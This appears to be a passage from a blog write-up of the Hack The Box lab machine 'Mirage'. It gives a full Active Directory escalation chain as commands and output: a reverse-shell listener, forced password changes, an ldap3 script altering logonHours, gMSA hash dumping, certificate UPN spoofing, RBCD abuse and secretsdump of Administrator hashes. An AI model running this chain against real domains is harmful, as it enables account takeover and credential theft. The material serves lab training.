[*] Warning: The logon for user 'mark.bbond' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-4345ab$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 2256 created in background.
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> 


(base) ┌──(kali㉿kali)-[~/Downloads]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.3] from (UNKNOWN) [10.129.104.218] 63865
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami
whoami
mirage\mark.bbond
PS C:\Windows\system32>

He is a member of IT_SUPPORT who have ForceChangePassword on JAVIER.MMARSHAL.
The path is as follows:
ticket as mark.bbon -> export it -> remove accountdisable for javier -> update logonHours with script -> change javier password -> use nxc to dump gmsa

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
PS C:\Windows\system32> Get-ADUser JAVIER.MMARSHALL -Property *
Get-ADUser JAVIER.MMARSHALL -Property *


AccountExpirationDate                : 
accountExpires                       : 9223372036854775807
AccountLockoutTime                   : 
AccountNotDelegated                  : False
AllowReversiblePasswordEncryption    : False
AuthenticationPolicy                 : {}
AuthenticationPolicySilo             : {}
BadLogonCount                        : 0
badPasswordTime                      : 0
badPwdCount                          : 0
CannotChangePassword                 : True
CanonicalName                        : mirage.htb/Disabled/Users/javier.mmarshall
Certificates                         : {}
City                                 : 
CN                                   : javier.mmarshall
codePage                             : 0
Company                              : 
CompoundIdentitySupported            : {False}
Country                              : 
countryCode                          : 0
Created                              : 5/2/2025 1:33:11 AM
createTimeStamp                      : 5/2/2025 1:33:11 AM
Deleted                              : 
Department                           : 
Description                          : Contoso Contractors
DisplayName                          : javier.mmarshall
DistinguishedName                    : CN=javier.mmarshall,OU=Users,OU=Disabled,DC=mirage,DC=htb
Division                             : 
DoesNotRequirePreAuth                : False
dSCorePropagationData                : {5/22/2025 2:49:20 PM, 5/22/2025 2:45:45 PM, 5/22/2025 2:02:51 PM, 5/22/2025 
                                       1:08:07 PM...}
EmailAddress                         : 
EmployeeID                           : 
EmployeeNumber                       : 
Enabled                              : False
Fax                                  : 
GivenName                            : javier.mmarshall
HomeDirectory                        : 
HomedirRequired                      : False
HomeDrive                            : 
HomePage                             : 
HomePhone                            : 
Initials                             : 
instanceType                         : 4
isDeleted                            : 
KerberosEncryptionType               : {None}
LastBadPasswordAttempt               : 
LastKnownParent                      : 
lastLogoff                           : 0
lastLogon                            : 133926722371201785
LastLogonDate                        : 5/22/2025 2:45:29 PM
lastLogonTimestamp                   : 133924239295082185
LockedOut                            : False
logonCount                           : 13
logonHours                           : {0, 0, 0, 0...}
LogonWorkstations                    : 
Manager                              : 
MemberOf                             : {CN=IT_Contractors,OU=Groups,OU=Contractors,OU=IT_Staff,DC=mirage,DC=htb}
MNSLogonAccount                      : False
MobilePhone                          : 
Modified                             : 5/25/2025 11:44:43 AM
modifyTimeStamp                      : 5/25/2025 11:44:43 AM
msDS-SupportedEncryptionTypes        : 0
msDS-User-Account-Control-Computed   : 0
Name                                 : javier.mmarshall
nTSecurityDescriptor                 : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                       : CN=Person,CN=Schema,CN=Configuration,DC=mirage,DC=htb
ObjectClass                          : user
ObjectGUID                           : c52e731b-30c1-439c-a6b9-0c2f804e5f08
objectSid                            : S-1-5-21-2127163471-3824721834-2568365109-1108
Office                               : 
OfficePhone                          : 
Organization                         : 
OtherName                            : 
PasswordExpired                      : False
PasswordLastSet                      : 5/25/2025 11:44:43 AM
PasswordNeverExpires                 : True
PasswordNotRequired                  : False
POBox                                : 
PostalCode                           : 
PrimaryGroup                         : CN=Domain Users,CN=Users,DC=mirage,DC=htb
primaryGroupID                       : 513
PrincipalsAllowedToDelegateToAccount : {}
ProfilePath                          : 
ProtectedFromAccidentalDeletion      : False
pwdLastSet                           : 133926722832178700
SamAccountName                       : javier.mmarshall
sAMAccountType                       : 805306368
ScriptPath                           : 
sDRightsEffective                    : 0
ServicePrincipalNames                : {}
SID                                  : S-1-5-21-2127163471-3824721834-2568365109-1108
SIDHistory                           : {}
SmartcardLogonRequired               : False
State                                : 
StreetAddress                        : 
Surname                              : 
Title                                : 
TrustedForDelegation                 : False
TrustedToAuthForDelegation           : False
UseDESKeyOnly                        : False
userAccountControl                   : 66050
userCertificate                      : {}
UserPrincipalName                    : [email protected]
uSNChanged                           : 69841
uSNCreated                           : 24655
whenChanged                          : 5/25/2025 11:44:43 AM
whenCreated                          : 5/2/2025 1:33:11 AM



PS C:\Windows\system32> 
1
2
3
4
5
6
7
8
9
10
11
12
(base) ┌──(kali㉿kali)-[~]
└─$ getTGT.py mirage.htb/'mark.bbond':'1day@atime' -dc-ip dc01.mirage.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in mark.bbond.ccache
                                                                                                        
(base) ┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=mark.bbond.ccache   
                                                                                                        
(base) ┌──(kali㉿kali)-[~]
└─$ bloodyAD --host 10.129.104.218 -d mirage.htb -k --dc-ip dc01.mirage.htb remove uac  JAVIER.MMARSHALL -f ACCOUNTDISABLE
[-] ['ACCOUNTDISABLE'] property flags removed from JAVIER.MMARSHALL's userAccountControl

even if you enable an account, login is still blocked outside the allowed time window defined in the logonHours attribute.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
(base) ┌──(kali㉿kali)-[~/gMSADumper]
└─$ bloodyAD --host 10.129.104.218 -d mirage.htb -k --dc-ip dc01.mirage.htb get object mark.bbond

distinguishedName: CN=mark.bbond,OU=Users,OU=Support,OU=IT_Staff,DC=mirage,DC=htb
accountExpires: 1601-01-01 00:00:00+00:00
badPasswordTime: 1601-01-01 00:00:00+00:00
badPwdCount: 0
cn: mark.bbond
codePage: 0
countryCode: 0
dSCorePropagationData: 2025-07-04 19:36:40+00:00
displayName: mark.bbond
givenName: mark.bbond
instanceType: 4
lastLogoff: 1601-01-01 00:00:00+00:00
lastLogon: 2025-07-23 20:56:04.981028+00:00
lastLogonTimestamp: 2025-07-23 17:50:03.460126+00:00
logonCount: 71
logonHours: ////////////////////////////

logonHours value should be ////////////////////////////

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
(base) ┌──(kali㉿kali)-[~]
└─$ cat update_javier.py 
from ldap3 import Server, Connection, SASL, GSSAPI, MODIFY_REPLACE
import os

os.environ["KRB5CCNAME"] = "./mark.bbond.ccache"

server = Server("dc01.mirage.htb", get_info=None)
conn = Connection(server, authentication=SASL, sasl_mechanism=GSSAPI)
conn.bind()

dn = "CN=javier.mmarshall,OU=Users,OU=Disabled,DC=mirage,DC=htb"
logon_hours_hex = "FF" * 21
logon_hours_bytes = bytes.fromhex(logon_hours_hex)

conn.modify(dn, {"logonHours": [(MODIFY_REPLACE, [logon_hours_bytes])]})
print(conn.result)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
(base) ┌──(kali㉿kali)-[~]
└─$ bloodyAD --host 10.129.104.218 -d mirage.htb -k --dc-ip dc01.mirage.htb get object JAVIER.MMARSHALL

distinguishedName: CN=javier.mmarshall,OU=Users,OU=Disabled,DC=mirage,DC=htb
accountExpires: 9999-12-31 23:59:59.999999+00:00
badPasswordTime: 1601-01-01 00:00:00+00:00
badPwdCount: 0
cn: javier.mmarshall
codePage: 0
countryCode: 0
dSCorePropagationData: 2025-05-22 21:49:20+00:00
description: Contoso Contractors
displayName: javier.mmarshall
givenName: javier.mmarshall
instanceType: 4
lastLogoff: 1601-01-01 00:00:00+00:00
lastLogon: 2025-07-23 20:56:28.711298+00:00
lastLogonTimestamp: 2025-07-23 20:52:44.575126+00:00
logonCount: 25
logonHours: ////////////////////////////
1
2
3
(base) ┌──(kali㉿kali)-[~]
└─$ bloodyAD --host 10.129.104.218 -d mirage.htb -k --dc-ip dc01.mirage.htb set password  JAVIER.MMARSHALL "kujenPassword123"
[+] Password changed successfully!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
(base) ┌──(kali㉿kali)-[~]
└─$ getTGT.py mirage.htb/'JAVIER.MMARSHALL':'kujenPassword123' -dc-ip dc01.mirage.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in JAVIER.MMARSHALL.ccache
                                                                                                        
(base) ┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=JAVIER.MMARSHALL.ccache 
                                                                                                        
(base) ┌──(kali㉿kali)-[~]
└─$ nxc ldap 10.129.104.218 -u JAVIER.MMARSHALL -p kujenPassword123 -k --gmsa
LDAP        10.129.104.218  389    DC01             [*] None (name:DC01) (domain:mirage.htb)
LDAPS       10.129.104.218  636    DC01             [+] mirage.htb\JAVIER.MMARSHALL:kujenPassword123 
LDAPS       10.129.104.218  636    DC01             [*] Getting GMSA Passwords
LDAPS       10.129.104.218  636    DC01             Account: Mirage-Service$      NTLM: 305806d84f7c1be93a07aaf40f0c7866     PrincipalsAllowedToReadPassword: javier.mmarshall 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
PS C:\users\mark.bbond\documents> Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.ObjectDN -match "mark.bbond"}
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.ObjectDN -match "mark.bbond"}


ObjectDN                : CN=mark.bbond,OU=Users,OU=Support,OU=IT_Staff,DC=mirage,DC=htb
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : WriteProperty
ObjectAceType           : Public-Information
AceFlags                : None
AceType                 : AccessAllowedObject
InheritanceFlags        : None
SecurityIdentifier      : S-1-5-21-2127163471-3824721834-2568365109-1112
IdentityReferenceName   : Mirage-Service$
IdentityReferenceDomain : mirage.htb
IdentityReferenceDN     : CN=Mirage-Service,CN=Managed Service Accounts,DC=mirage,DC=htb
IdentityReferenceClass  : computer
1
2
3
4
5
6
7
8
9
10
11
12
13
(base) ┌──(kali㉿kali)-[~]
└─$ certipy account update \                                                                       
  -user 'mark.bbond' \
  -upn '[email protected]' \
  -u '[email protected]' \
  -k -no-pass \
  -dc-ip 10.129.104.218 \
  -target dc01.mirage.htb
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Updating user 'mark.bbond':
    userPrincipalName                   : dc01$@mirage.htb
[*] Successfully updated 'mark.bbond'

We can perform UPN spoofing to request a certificate as dc01

We have enough permissions to escalate to the administrator account with ESC10. We can learn how to do it by reading the wiki documentation for certipy. Grant resourced based constrained delegation from the domain controller to the group managed service account, then use it to read the hash for the administrator account.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
(base) ┌──(kali㉿kali)-[~]
└─$ getTGT.py mirage.htb/'mark.bbond':'1day@atime' -dc-ip dc01.mirage.htb            
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in mark.bbond.ccache
                                                                                                      
(base) ┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=mark.bbond.ccache
                                                                                                                
(base) ┌──(kali㉿kali)-[~]
└─$ certipy req -u [email protected] -no-pass -k -ca mirage-DC01-CA -template User -dc-ip $IP -dc-host dc01.mirage.htb
                                                                                                      
(base) ┌──(kali㉿kali)-[~]
└─$ getTGT.py mirage.htb/'mark.bbond':'1day@atime' -dc-ip dc01.mirage.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in mark.bbond.ccache
                                                                                                      
(base) ┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=mark.bbond.ccache
                                                                                                      
(base) ┌──(kali㉿kali)-[~]
└─$ certipy req -u [email protected] -no-pass -k -ca mirage-DC01-CA -template User -dc-ip 10.129.104.218 -dc-host dc01.mirage.htb
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[!] Target name (-target) not specified and Kerberos authentication is used. This might fail
[*] Requesting certificate via RPC
[*] Request ID is 10
[*] Successfully requested certificate
[*] Got certificate with UPN '[email protected]'
[*] Certificate object SID is 'S-1-5-21-2127163471-3824721834-2568365109-1109'
[*] Saving certificate and private key to 'dc01.pfx'
[*] Wrote certificate and private key to 'dc01.pfx'
                                                                                                      
(base) ┌──(kali㉿kali)-[~]
└─$ getTGT.py MIRAGE.HTB/Mirage-Service$ -hashes :305806d84f7c1be93a07aaf40f0c7866
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in Mirage-Service$.ccache
                                                                                                      
(base) ┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=Mirage-Service\$.ccache 
                                                                                                      
(base) ┌──(kali㉿kali)-[~]
└─$ certipy-ad account \
  -u 'mirage-service$' \
  -k -no-pass \
  -target 'dc01.mirage.htb' \
  -upn '[email protected]' \
  -user 'mark.bbond' \
  update
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The DNS query name does not exist: dc01.mirage.htb.
[!] Use -debug to print a stacktrace
[*] Updating user 'mark.bbond':
    userPrincipalName                   : [email protected]
[*] Successfully updated 'mark.bbond'
                                                                                                      
(base) ┌──(kali㉿kali)-[~]
└─$ certipy auth -pfx dc01.pfx -dc-ip 10.129.104.218 -ldap-shell
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: '[email protected]'
[*]     Security Extension SID: 'S-1-5-21-2127163471-3824721834-2568365109-1109'
[*] Connecting to 'ldaps://10.129.104.218:636'
[*] Authenticated to '10.129.104.218' as: 'u:MIRAGE\\DC01$'
Type help for list of commands

# whoami
u:MIRAGE\DC01$

# set_rbcd dc01$ Mirage-Service$
Found Target DN: CN=DC01,OU=Domain Controllers,DC=mirage,DC=htb
Target SID: S-1-5-21-2127163471-3824721834-2568365109-1000

Found Grantee DN: CN=Mirage-Service,CN=Managed Service Accounts,DC=mirage,DC=htb
Grantee SID: S-1-5-21-2127163471-3824721834-2568365109-1112
Delegation rights modified successfully!
Mirage-Service$ can now impersonate users on dc01$ via S4U2Proxy

# Bye!

                                                                                                      
(base) ┌──(kali㉿kali)-[~]
└─$ impacket-getTGT -dc-ip 10.129.104.218 "mirage.htb/Mirage-Service$" -hashes :305806d84f7c1be93a07aaf40f0c7866
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in Mirage-Service$.ccache
                                                                                                      
(base) ┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME='Mirage-Service$.ccache'
                                                                                                      
(base) ┌──(kali㉿kali)-[~]
└─$ impacket-getST -spn 'cifs/dc01.mirage.htb' -impersonate 'dc01$' -dc-ip 10.129.104.218  'mirage.htb/Mirage-Service$' -k -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Impersonating dc01$
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in dc01$@cifs_dc01[email protected]
                                                                                                      
(base) ┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=dc01$@cifs_dc01[email protected]
                                                                                                      
(base) ┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=dc01\$@cifs_dc01[email protected] 
                                                                                                      
(base) ┌──(kali㉿kali)-[~]
└─$ impacket-secretsdump 'dc01$'@dc01.mirage.htb -k -no-pass -dc-ip 10.129.104.218 -just-dc-user administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
mirage.htb\Administrator:500:aad3b435b51404eeaad3b435b51404ee:7be6d4f3c2b9c0e3560f5a29eeb1afb3:::
[*] Kerberos keys grabbed
mirage.htb\Administrator:aes256-cts-hmac-sha1-96:09454bbc6da252ac958d0eaa211293070bce0a567c0e08da5406ad0bce4bdca7
mirage.htb\Administrator:aes128-cts-hmac-sha1-96:47aa953930634377bad3a00da2e36c07
mirage.htb\Administrator:des-cbc-md5:e02a73baa10b8619
[*] Cleaning up...

And finally claim my root flag:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
(base) ┌──(kali㉿kali)-[~]
└─$ impacket-getTGT -dc-ip 10.129.104.218 "mirage.htb/Administrator" -hashes :7be6d4f3c2b9c0e3560f5a29eeb1afb3
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in Administrator.ccache
                                                                                                      
(base) ┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=Administrator.ccache 
                                                                                                      
(base) ┌──(kali㉿kali)-[~]
└─$ evil-winrm -i dc01.mirage.htb -r mirage.htb
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                                     
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                                       
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../desktop/root.txt
ae9c51e9d9569cef82df05dce7bb7c80
  • Title: Hackthebox: Mirage
  • Author: Foued SAIDI
  • Created at : 2025-11-22 20:59:41
  • Updated at : 2025-11-22 21:03:46
  • Link: https://kujen5.github.io/2025/11/22/Hackthebox-Mirage/
  • License: This work is licensed under CC BY-NC-SA 4.0.
On this page
Hackthebox: Mirage
  1. Overview
  2. Reconnaissance